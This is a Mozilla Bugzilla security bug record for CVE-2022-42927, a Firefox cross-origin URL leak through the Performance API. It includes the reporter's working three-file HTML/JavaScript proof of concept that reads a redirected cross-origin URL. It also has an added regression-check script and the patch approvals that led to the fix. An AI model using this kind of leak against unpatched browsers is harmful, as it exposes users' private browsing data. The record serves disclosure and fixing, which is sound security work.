Closed Bug 1789128 (CVE-2022-42927) Opened 2 years ago Closed 2 years ago

A Variant of bug id 1487964: Cross-Origin URL Steal is possible using performance.getEntries()

Categories

(Core :: DOM: Performance, defect)

defect

Tracking


RESOLVED FIXED
107 Branch
Tracking Status
firefox-esr91 --- wontfix
firefox-esr102 106+ fixed
firefox104 --- wontfix
firefox105 --- wontfix
firefox106 + fixed
firefox107 --- fixed

People

(Reporter: proof131072, Assigned: valentin)

References

(Regression)

Details

(Keywords: csectype-sop, regression, sec-high, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main106+][adv-esr102.4+])

Attachments

(3 files)

We are able to steal a cross-origin URL when we frame the page. This is a variant of https://bugzilla.mozilla.org/show_bug.cgi?id=1487964

PoC:

framescript.php:

<!-- Top-level page: frames the attacker-controlled ffembed.php -->
<iframe src="http://pwning.click/ffembed.php"></iframe>

ffembed.php:

<!-- Embeds a same-origin document that will navigate itself cross-origin,
     then reads the resource entry for that embed from the Performance API -->
<embed src="/ffscript.php">
<script>
setTimeout(function(){alert(performance.getEntriesByType("resource")[1].name)},3000);
</script>

ffscript.php:

<!-- Embedded document: navigates itself to a cross-origin URL -->
<script>location="https://www.bing.com/search?q=test"</script>

Test on: http://pwning.click/framescript.php

I tested on the latest Firefox Nightly for Windows.

Flags: sec-bounty?
Group: firefox-core-security → dom-core-security
Component: Security → DOM: Navigation
Product: Firefox → Core
Component: DOM: Navigation → DOM: Performance
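The reporter's PoC reads one hard-coded index out of the resource timeline. The following is an added example, not code from the bug report or from Firefox, that turns the same check into a small regression harness: it flags any PerformanceResourceTiming-style entry whose name is a cross-origin URL the embedding document never requested, which is exactly what a redirect target showing up in `name` looks like. The embedder origin, the requested-URL set and the sample entries are constructed to match the PoC hosts; in a browser you would pass `performance.getEntriesByType("resource")` instead of the constructed list.

```javascript
// Added example (not part of the bug report). Offline model of the check the
// reporter's PoC performs by hand: per Resource Timing, an entry's `name` is the
// URL the document requested, so a cross-origin redirect target must never
// appear there. Any such entry is reported as a leak.

// Origin of the document that calls performance.getEntriesByType().
// Assumed value, taken from the PoC host.
const EMBEDDER_ORIGIN = "http://pwning.click";

// URLs this document itself requested (the embed's src). Assumed from the PoC.
const REQUESTED_URLS = new Set(["http://pwning.click/ffscript.php"]);

function isSameOrigin(url, origin) {
  return new URL(url).origin === origin;
}

// Returns the names of entries that are neither a URL this document requested
// nor same-origin with it. Same-origin URLs are not interesting: the page could
// learn them anyway.
function findLeakedUrls(entries, embedderOrigin, requestedUrls) {
  return entries
    .filter((e) => e.entryType === "resource")
    .filter((e) => !requestedUrls.has(e.name))
    .filter((e) => !isSameOrigin(e.name, embedderOrigin))
    .map((e) => e.name);
}

// Constructed sample timeline. The first two entries are what a page should
// see for its own same-origin loads; the third has the shape of the leak the
// report describes (the embed's post-redirect, cross-origin URL).
const SAMPLE_ENTRIES = [
  { entryType: "resource", name: "http://pwning.click/style.css", initiatorType: "link" },
  { entryType: "resource", name: "http://pwning.click/ffscript.php", initiatorType: "embed" },
  { entryType: "resource", name: "https://www.bing.com/search?q=test", initiatorType: "embed" },
];

function runCheck(entries = SAMPLE_ENTRIES) {
  return findLeakedUrls(entries, EMBEDDER_ORIGIN, REQUESTED_URLS);
}

if (typeof require !== "undefined" && require.main === module) {
  const leaked = runCheck();
  console.log(leaked.length ? `LEAK: ${leaked.join(", ")}` : "no cross-origin URLs exposed");
}
```

In a real test page you would populate the requested-URL set from the `src` attributes you wrote into the document and run `runCheck(performance.getEntriesByType("resource"))` after the embed has had time to navigate, as the PoC's `setTimeout` does; an empty result is the expected outcome on a patched browser.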

This regressed starting with bug 1732358 which enabled fission, but the actual bug was introduced in bug 1658097.

Regressed by: 1732358, 1658097
Assignee: nobody → valentin.gosu

We're building the final beta of the Fx105 cycle today. Let's shoot for getting this fix into the next cycle.

Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!

Security Approval Request

  • How easily could an exploit be constructed based on the patch?: Relatively easily. Anyone with access or knowledge of previous vulnerabilities would be able to figure out what's wrong.
  • Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: Yes
  • Which older supported branches are affected by this flaw?: all
  • If not all supported branches, which bug introduced the flaw?: None
  • Do you have backports for the affected branches?: Yes
  • If not, how different, hard to create, and risky will they be?: Easy
  • How likely is this patch to cause regressions; how much testing does it need?: Low risk of functional regressions.
    There is a small risk of perf regressions on pages with iframes since now we're serializing the entire loadInfo, but that's easily fixable if necessary.
  • Is Android affected?: Yes
Attachment #9293697 - Flags: sec-approval?
Group: dom-core-security → layout-core-security

Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!

Approved to land and uplift

Attachment #9293697 - Flags: sec-approval? → sec-approval+
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01]

Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!

Beta/Release Uplift Approval Request

  • User impact if declined: Cross origin leak of information using the performance API
  • Is this code covered by automated tests?: Yes
  • Has the fix been verified in Nightly?: No
  • Needs manual test from QE?: No
  • If yes, steps to reproduce: (we have automated testing)
  • List of other uplifts needed: None
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky): Fixes a regression. The fix is simple.
    Small chance for performance regression (in testcases with lots of iframes) since we now serialize the entire loadinfo instead of just the innerWindowID.
  • String changes made/needed:
  • Is Android affected?: Yes

ESR Uplift Approval Request

  • If this is not a sec:{high,crit} bug, please state case for ESR consideration:
  • User impact if declined:
  • Fix Landed on Version: 107
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky):
Attachment #9293697 - Flags: approval-mozilla-esr102?
Attachment #9293697 - Flags: approval-mozilla-beta?
Group: layout-core-security → core-security-release
Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Target Milestone: --- → 107 Branch

Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!

Approved for 106.0b3, thanks.

Attachment #9293697 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Flags: qe-verify-
Whiteboard: [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01] → [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage]

Comment on attachment 9293697 [details]
Bug 1789128 - Always call LoadInfo::GetPerformanceStorage() r=#necko,smaug!

Approved for 102.4esr.

Attachment #9293697 - Flags: approval-mozilla-esr102? → approval-mozilla-esr102+
Regressions: 1793521
Flags: sec-bounty? → sec-bounty+
Whiteboard: [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage] → [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage][adv-main106+]
Whiteboard: [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage][adv-main106+] → [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage][adv-main106+][adv-esr102.4+]
Attached file advisory.txt (deleted) —
Alias: CVE-2022-42927
No longer regressions: 1793521
Group: core-security-release

3 months ago, Tom Ritter [:tjr] placed a reminder on the bug using the whiteboard tag [reminder-test 2022-11-01].

valentin, please refer to the original comment to better understand the reason for the reminder.

Flags: needinfo?(valentin.gosu)
Whiteboard: [reporter-external] [client-bounty-form] [verif?][reminder-test 2022-11-01][post-critsmash-triage][adv-main106+][adv-esr102.4+] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main106+][adv-esr102.4+]
Flags: needinfo?(valentin.gosu)
